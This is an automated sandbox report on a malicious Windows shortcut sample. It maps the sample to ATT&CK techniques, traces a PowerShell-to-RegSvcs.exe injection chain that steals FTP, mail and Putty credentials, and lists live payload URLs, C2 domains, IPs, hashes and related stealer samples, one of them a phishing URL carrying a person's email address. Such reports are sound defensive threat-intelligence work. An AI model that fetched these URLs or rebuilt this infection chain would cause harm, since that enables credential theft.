Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 5768, type: MEMORYSTR
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 111 Scripting | Valid Accounts | 221 Windows Management Instrumentation | 111 Scripting | 1 DLL Side-Loading | 1 Disable or Modify Tools | 2 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Command and Scripting Interpreter | 1 DLL Side-Loading | 212 Process Injection | 1 Obfuscated Files or Information | 11 Input Capture | 124 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 2 PowerShell | 21 Registry Run Keys / Startup Folder | 21 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | 1 Credentials in Registry | 621 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Masquerading | NTDS | 12 Process Discovery | Distributed Component Object Model | 11 Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 251 Virtualization/Sandbox Evasion | LSA Secrets | 251 Virtualization/Sandbox Evasion | SSH | 1 Clipboard Data | 23 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 212 Process Injection | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Hidden Files and Directories | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Behavior Graph ID: 1520403 | Sample: RTGS-WB-ABS-240730-NEW.lnk | Startdate: 27/09/2024 | Architecture: WINDOWS | Score: 100

Start (sample)
  Domains/IPs: techniqueqatar.com; oootorgline.ru; 3 other IPs or domains
  Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 12 other signatures
  Started: powershell.exe; wscript.exe; aWUFv.exe; aWUFv.exe

powershell.exe
  Network: oootorgline.ru 176.99.3.36, 443, 61245 AS-REGRU Russian Federation
  Dropped: C:\Users\user\AppData\Local\Temp\file.exe, PE32
  Signatures: Powershell drops PE file
  Started: file.exe; conhost.exe

wscript.exe
  Signatures: Windows Scripting host queries suspicious COM object (likely to drop second stage)
  Started: recomplaint.exe

aWUFv.exe (each of the two instances)
  Started: conhost.exe

file.exe (started by powershell.exe)
  Dropped: C:\Users\user\AppData\...\recomplaint.exe, PE32
  Signatures: Machine Learning detection for dropped file
  Started: recomplaint.exe

recomplaint.exe (started by wscript.exe)
  Signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process
  Started: RegSvcs.exe

recomplaint.exe (started by file.exe)
  Dropped: C:\Users\user\AppData\...\recomplaint.vbs, data
  Signatures: Machine Learning detection for dropped file; Drops VBS files to the startup folder; Writes to foreign memory regions; 2 other signatures
  Started: RegSvcs.exe

RegSvcs.exe (started by the recomplaint.exe under wscript.exe)
  Network: 104.26.13.205, 443, 60910 CLOUDFLARENETUS United States
  Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; 3 other signatures

RegSvcs.exe (started by the recomplaint.exe under file.exe)
  Network: ip-api.com 208.95.112.1, 60911, 61254, 80 TUT-ASUS United States; techniqueqatar.com 208.91.198.176, 587, 60905, 60912 PUBLIC-DOMAIN-REGISTRYUS United States; api.ipify.org 172.67.74.152, 443, 61253 CLOUDFLARENETUS United States
  Dropped: C:\Users\user\AppData\Roaming\...\aWUFv.exe, PE32
  Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); 5 other signatures

                    SourceDetectionScannerLabelLink
                    RTGS-WB-ABS-240730-NEW.lnk24%ReversingLabsScript-BAT.Trojan.Heuristic
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\file.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Local\unspattered\recomplaint.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe0%ReversingLabs
                    No Antivirus matches
                    No Antivirus matches
Source | Detection | Scanner | Label
https://api.ipify.org/ | 0% | URL Reputation | safe
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
https://api.ipify.org | 0% | URL Reputation | safe
https://account.dyn.com/ | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://ip-api.com/line/?fields=hosting | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
techniqueqatar.com | 208.91.198.176 | true | true | | unknown
oootorgline.ru | 176.99.3.36 | true | true | | unknown
api.ipify.org | 172.67.74.152 | true | false | | unknown
ip-api.com | 208.95.112.1 | true | true | | unknown
171.39.242.20.in-addr.arpa | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | false | URL Reputation: safe | unknown
https://oootorgline.ru/components/grace.exe | true | | unknown
http://ip-api.com/line/?fields=hosting | false | URL Reputation: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000000.00000002.2287618621.00000221376BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2287618621.0000022137800000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.ipify.org | RegSvcs.exe, 00000008.00000002.2567429663.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2557012499.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3370850966.00000000028EC000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://oootorgline.ru | powershell.exe, 00000000.00000002.2262113733.0000022128282000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
http://crl.m | RegSvcs.exe, 0000000C.00000002.3381286822.0000000005C16000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://account.dyn.com/ | RegSvcs.exe, 00000008.00000002.2557012499.0000000000402000.00000040.80000000.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000000.00000002.2262113733.0000022127882000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000000.00000002.2262113733.0000022127882000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://go.micro | powershell.exe, 00000000.00000002.2262113733.0000022128282000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 00000000.00000002.2287618621.0000022137800000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000000.00000002.2287618621.00000221376BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2287618621.0000022137800000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.microsoft.co | powershell.exe, 00000000.00000002.2296430995.000002213F920000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://contoso.com/License | powershell.exe, 00000000.00000002.2287618621.0000022137800000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ip-api.com | RegSvcs.exe, 00000008.00000002.2567429663.0000000003401000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3370850966.0000000002931000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://contoso.com/Icon | powershell.exe, 00000000.00000002.2287618621.0000022137800000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://oootorgline.ru | powershell.exe, 00000000.00000002.2262113733.0000022128C30000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://aka.ms/pscore68 | powershell.exe, 00000000.00000002.2262113733.0000022127651000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.ipify.org/t | RegSvcs.exe, 00000008.00000002.2567429663.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3370850966.00000000028EC000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000000.00000002.2262113733.0000022127651000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2567429663.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3370850966.00000000028EC000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://techniqueqatar.com | RegSvcs.exe, 00000008.00000002.2567429663.00000000034CB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.2567429663.000000000343E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3370850966.0000000002989000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3370850966.0000000002A17000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://github.com/Pester/Pester | powershell.exe, 00000000.00000002.2262113733.0000022127882000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
208.91.198.176 | techniqueqatar.com | United States | 394695 | PUBLIC-DOMAIN-REGISTRYUS | true
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | true
176.99.3.36 | oootorgline.ru | Russian Federation | 197695 | AS-REGRU | true
104.26.13.205 | unknown | United States | 13335 | CLOUDFLARENETUS | false
172.67.74.152 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1520403
Start date and time: 2024-09-27 10:38:10 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 2s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 17
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: RTGS-WB-ABS-240730-NEW.lnk
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winLNK@17/13@8/5
EGA Information:
• Successful, ratio: 40%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 151
• Number of non-executed functions: 4
Cookbook Comments:
• Found application associated with file extension: .lnk
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target aWUFv.exe, PID 2120 because it is empty
• Execution Graph export aborted for target aWUFv.exe, PID 3884 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 1824 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: RTGS-WB-ABS-240730-NEW.lnk
Time | Type | Description
04:39:07 | API Interceptor | 43x Sleep call for process: powershell.exe modified
04:39:28 | API Interceptor | 88671x Sleep call for process: RegSvcs.exe modified
10:39:29 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\recomplaint.vbs
10:39:42 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run aWUFv C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe
10:39:50 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run aWUFv C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe
Match (IP) | Associated Sample Name / URL | Detection | Threat Name | Context
208.95.112.1 | Payment.js | malicious | WSHRAT | ip-api.com/json/
208.95.112.1 | 17273903480db0ad761710af8e624417944f4f8d39d0a8e65a343113de75e06efab5a25c3f534.dat-decoded.exe | malicious | Clipboard Hijacker, Quasar | ip-api.com/json/
208.95.112.1 | file.exe | malicious | Quasar, WhiteSnake Stealer | ip-api.com/line?fields=query,country
208.95.112.1 | REQUEST FOR QUOTATION.js | malicious | PXRECVOWEIWOEI Stealer, PureLog Stealer | ip-api.com/line/?fields=hosting
208.95.112.1 | DSR0987678900000.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | Proof Of Payment.js | malicious | WSHRAT | ip-api.com/json/
208.95.112.1 | 450230549.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | SecuriteInfo.com.Win32.Malware-gen.27656.20815.exe | malicious | Blackshades, Quasar | ip-api.com/json/
208.95.112.1 | nDHL_AWB_6078538091_scr.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | CCE_000110.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
104.26.13.205 | file.exe | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar | api.ipify.org/
104.26.13.205 | file.exe | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar | api.ipify.org/
104.26.13.205 | SecuriteInfo.com.Win64.Evo-gen.13899.14592.exe | malicious | Unknown | api.ipify.org/
104.26.13.205 | file.exe | malicious | LummaC, Vidar | api.ipify.org/
104.26.13.205 | file.exe | malicious | LummaC, Stealc, Vidar | api.ipify.org/
104.26.13.205 | file.exe | malicious | LummaC, Stealc, Vidar | api.ipify.org/
104.26.13.205 | file.exe | malicious | LummaC, Stealc, Vidar | api.ipify.org/
104.26.13.205 | file.exe | malicious | Unknown | api.ipify.org/
104.26.13.205 | file.exe | malicious | Unknown | api.ipify.org/
104.26.13.205 | file.exe | malicious | LummaC, Vidar | api.ipify.org/
Match (Domain) | Associated Sample Name / URL | Detection | Threat Name | Context
ip-api.com | Payment.js | malicious | WSHRAT | 208.95.112.1
ip-api.com | 17273903480db0ad761710af8e624417944f4f8d39d0a8e65a343113de75e06efab5a25c3f534.dat-decoded.exe | malicious | Clipboard Hijacker, Quasar | 208.95.112.1
ip-api.com | file.exe | malicious | Quasar, WhiteSnake Stealer | 208.95.112.1
ip-api.com | REQUEST FOR QUOTATION.js | malicious | PXRECVOWEIWOEI Stealer, PureLog Stealer | 208.95.112.1
ip-api.com | DSR0987678900000.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | Proof Of Payment.js | malicious | WSHRAT | 208.95.112.1
ip-api.com | 450230549.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | SecuriteInfo.com.Win32.Malware-gen.27656.20815.exe | malicious | Blackshades, Quasar | 208.95.112.1
ip-api.com | nDHL_AWB_6078538091_scr.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | CCE_000110.exe | malicious | AgentTesla | 208.95.112.1
api.ipify.org | Purchase order.exe | malicious | AgentTesla | 172.67.74.152
api.ipify.org | https://mzansibonds.com/dshk/tmpasdfghjklkjhgfdewertyuioiuytresdxcvbnmnbvfcdsew345678987654rewsdfvgbhnjhbgvfdesw23e45678uijdhgfcsvzbdncqasdcxw.php | malicious | HTMLPhisher | 104.26.13.205
api.ipify.org | http://correctingservicesalakks.pages.dev/ | malicious | Unknown | 104.26.12.205
api.ipify.org | file.exe | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar | 104.26.12.205
api.ipify.org | file.exe | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar | 104.26.12.205
api.ipify.org | https://lothanse-heracklarne.pages.dev/help/contact/547074160798771 | malicious | HTMLPhisher | 104.26.13.205
api.ipify.org | file.exe | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar | 172.67.74.152
api.ipify.org | file.exe | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar | 104.26.13.205
api.ipify.org | file.exe | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar | 104.26.13.205
api.ipify.org | https://docs.zoom.us/doc/c63Sae4RQ6OyTcxmh_zLzw?from=email&data=05%7C02%7CRyan.Deiter@americansignature.com%7Ce3b8b957491b4e36dfd108dcde65b619%7C5c02e89ab9684d4e960de62c7cd02766%7C0%7C0%7C638629775655136517%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0=%7C0%7C%7C%7C&sdata=RMvLQDF1y92hR5HKChbiO0e0aKONAOKzPjDkQ4i5MTY=&reserved=0 | malicious | Unknown | 172.67.74.152
Match (ASN) | Associated Sample Name / URL | Detection | Threat Name | Context
PUBLIC-DOMAIN-REGISTRYUS | Dekont.rar.xlxs.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 119.18.54.39
PUBLIC-DOMAIN-REGISTRYUS | http://labanquepostale.jupiter-analytics.com/thierry--_--.barbier/brigitte.--_--boissel@/francoise--_--.mariani@/salvatore--_--.fazzalari | malicious | Unknown | 162.222.225.80
PUBLIC-DOMAIN-REGISTRYUS | https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/p%C2%ADep%C2%ADe%C2%ADm%C2%ADu%C2%ADj%C2%ADi%C2%ADc%C2%ADa%C2%AD.%C2%ADc%C2%ADom/hj | malicious | Unknown | 162.215.254.118
PUBLIC-DOMAIN-REGISTRYUS | http://labanquepostale.jupiter-analytics.com/thierry--_--.barbier/brigitte.--_--boissel@/francoise--_--.mariani@/salvatore--_--.fazzalari/ | malicious | Unknown | 162.222.225.80
PUBLIC-DOMAIN-REGISTRYUS | SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exe | malicious | Snake Keylogger, VIP Keylogger | 208.91.199.225
PUBLIC-DOMAIN-REGISTRYUS | Halkbank_Ekstre_22#U202693.25.09.24.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 119.18.54.39
PUBLIC-DOMAIN-REGISTRYUS | z84TTREMITTANCEUSD347_432_63.exe | malicious | Snake Keylogger, VIP Keylogger | 208.91.198.143
PUBLIC-DOMAIN-REGISTRYUS | z9OutstandingPayment.exe | malicious | Snake Keylogger, VIP Keylogger | 208.91.199.223
PUBLIC-DOMAIN-REGISTRYUS | http://www.tri-star.in/mn/onedrive.html | malicious | Unknown | 208.91.198.225
PUBLIC-DOMAIN-REGISTRYUS | PAYSLIP.exe | malicious | Snake Keylogger, VIP Keylogger | 208.91.199.224
AS-REGRU | PO For Bulk Order.exe | malicious | FormBook | 31.31.196.17
AS-REGRU | UMOWA_PD.BAT.exe | malicious | FormBook, GuLoader | 194.58.112.174
AS-REGRU | CSBls4grBI.exe | malicious | LummaC, Socks5Systemz | 194.58.114.223
AS-REGRU | 0435.pdf.exe | malicious | SmokeLoader | 194.58.112.174
AS-REGRU | AWB_5771388044 Documenti di spedizione.exe | malicious | FormBook | 194.58.112.174
AS-REGRU | PO2024033194.exe | malicious | FormBook | 194.58.112.174
AS-REGRU | RECIEPT.PDF.exe | malicious | FormBook | 194.58.112.174
AS-REGRU | SecuriteInfo.com.Win32.TrojanX-gen.1325.25139.exe | malicious | Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Stealc, Vidar | 194.58.114.223
AS-REGRU | http://xn--r1a.website/s/ogorodru | malicious | Unknown | 194.67.71.75
AS-REGRU | ncOLm62YLB.exe | malicious | FormBook | 194.58.112.174
CLOUDFLARENETUS | #docs_8299010377388200191-pdf.js | malicious | Snake Keylogger, VIP Keylogger | 162.159.129.233
CLOUDFLARENETUS | AGMETIGA zapytanie ofertowe.xls | malicious | PureLog Stealer | 172.67.179.215
CLOUDFLARENETUS | 175-33-26-24.HTA.hta | malicious | Unknown | 104.16.231.132
CLOUDFLARENETUS | Dekont.rar.xlxs.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
CLOUDFLARENETUS | dekont.pdf.exe | malicious | Snake Keylogger | 188.114.97.3
CLOUDFLARENETUS | Ziraat Bankasi Swift Mesaji.exe | malicious | Snake Keylogger | 188.114.97.3
CLOUDFLARENETUS | Purchase Inquiry-0012.xls | malicious | Unknown | 104.21.64.88
CLOUDFLARENETUS | QT2Q1292.xla.xlsx | malicious | FormBook | 104.21.64.88
CLOUDFLARENETUS | https://bgbonline.cecchinatoonline.top/ | malicious | HtmlDropper | 188.114.96.3
CLOUDFLARENETUS | QUOTATION_SEPQTRA071244PDF.scr.exe | malicious | Snake Keylogger | 188.114.96.3
TUT-ASUS | Payment.js | malicious | WSHRAT | 208.95.112.1
TUT-ASUS | 17273903480db0ad761710af8e624417944f4f8d39d0a8e65a343113de75e06efab5a25c3f534.dat-decoded.exe | malicious | Clipboard Hijacker, Quasar | 208.95.112.1
TUT-ASUS | file.exe | malicious | Quasar, WhiteSnake Stealer | 208.95.112.1
TUT-ASUS | REQUEST FOR QUOTATION.js | malicious | PXRECVOWEIWOEI Stealer, PureLog Stealer | 208.95.112.1
TUT-ASUS | DSR0987678900000.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | Proof Of Payment.js | malicious | WSHRAT | 208.95.112.1
TUT-ASUS | 450230549.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | SecuriteInfo.com.Win32.Malware-gen.27656.20815.exe | malicious | Blackshades, Quasar | 208.95.112.1
TUT-ASUS | nDHL_AWB_6078538091_scr.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | 0umBa15TaN.exe | malicious | Unknown | 208.95.112.1
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | #docs_8299010377388200191-pdf.js | malicious | Snake Keylogger, VIP Keylogger | 104.26.13.205, 176.99.3.36, 172.67.74.152
3b5074b1b5d032e5620f69f9f700ff0e | Dekont.rar.xlxs.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 104.26.13.205, 176.99.3.36, 172.67.74.152
3b5074b1b5d032e5620f69f9f700ff0e | https://ojbkjs.vip/yb.js | malicious | Unknown | 104.26.13.205, 176.99.3.36, 172.67.74.152
3b5074b1b5d032e5620f69f9f700ff0e | QUOTATION_SEPQTRA071244PDF.scr.exe | malicious | Snake Keylogger | 104.26.13.205, 176.99.3.36, 172.67.74.152
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | Unknown | 104.26.13.205, 176.99.3.36, 172.67.74.152
3b5074b1b5d032e5620f69f9f700ff0e | Purchase order.exe | malicious | AgentTesla | 104.26.13.205, 176.99.3.36, 172.67.74.152
3b5074b1b5d032e5620f69f9f700ff0e | https://jbrizuelablplegal.taplink.ws/ | malicious | HTMLPhisher | 104.26.13.205, 176.99.3.36, 172.67.74.152
3b5074b1b5d032e5620f69f9f700ff0e | http://home-103607.weeblysite.com/ | malicious | HTMLPhisher | 104.26.13.205, 176.99.3.36, 172.67.74.152
3b5074b1b5d032e5620f69f9f700ff0e | http://brawllstars.ru/ | malicious | HTMLPhisher | 104.26.13.205, 176.99.3.36, 172.67.74.152
3b5074b1b5d032e5620f69f9f700ff0e | https://tiktomallapp.top/ | malicious | Unknown | 104.26.13.205, 176.99.3.36, 172.67.74.152
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe | shipping documents.exe | malicious | AgentTesla
C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe | shipping documents.exe | malicious | AgentTesla
C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe | autorization Letter.exe | malicious | AgentTesla
C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe | rMT103SwiftCopyoFPayment.exe | malicious | AgentTesla
C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe | Shipping Document.exe | malicious | AgentTesla
C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe | COMMERCAIL INVOICE AND TNT AWB TRACKING INVOICE.exe | malicious | AgentTesla
C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe | DHL- CBJ520818836689.pdf.exe | malicious | AgentTesla
C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe | DHL- CBJ520818836689.exe | malicious | AgentTesla
C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe | Shipping documents.exe | malicious | AgentTesla
C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe | Shipping doc.exe | malicious | AgentTesla
                                                                      Process:C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:modified
                                                                      Size (bytes):142
                                                                      Entropy (8bit):5.090621108356562
                                                                      Encrypted:false
                                                                      SSDEEP:3:QHXMKa/xwwUC7WglAFXMWA2yTMGfsbNRLFS9Am12MFuAvOAsDeieVyn:Q3La/xwczlAFXMWTyAGCDLIP12MUAvvw
                                                                      MD5:8C0458BB9EA02D50565175E38D577E35
                                                                      SHA1:F0B50702CD6470F3C17D637908F83212FDBDB2F2
                                                                      SHA-256:C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
                                                                      SHA-512:804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
                                                                      Malicious:false
                                                                      Reputation:high, very likely benign file
                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):64
                                                                      Entropy (8bit):1.1940658735648508
                                                                      Encrypted:false
                                                                      SSDEEP:3:Nlllul51Tz:NllU
                                                                      MD5:63C202BE9DBE08688DBCF921992E089A
                                                                      SHA1:AA18D35F50D15566FA375F9FDB030CDBEE26F777
                                                                      SHA-256:4CB3BC30A57F1DEFAE2677102DA2CC3FAAF8D402CF25D247EFC4A5242C2C986B
                                                                      SHA-512:C43049499F7E07BE8DFE945AB801FB2E39AB0BA55F2E8A884FFDAC7A56C0E80BF188033218FE9B28A8374EB5843B462A8BF7F15E1D74162A641F470AD989B392
                                                                      Malicious:false
                                                                      Preview:@...e.................................h.T............@..........
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
